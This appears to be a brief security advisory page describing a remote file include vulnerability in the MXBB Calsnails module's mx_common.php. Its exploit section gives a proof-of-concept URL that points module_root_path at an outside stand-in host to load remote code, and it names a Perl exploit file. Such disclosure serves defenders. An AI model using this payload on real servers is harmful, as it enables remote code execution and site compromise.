MXBB Calsnails Module MX_Common.PHP Remote File Include Vulnerability

info
discussion
exploit
solution
references

MXBB Calsnails Module MX_Common.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof of concept and exploit code are available:

http://www.example.com/includes/mx_common.php?module_root_path=http://www.example2.com

/data/vulnerabilities/exploits/21143.pl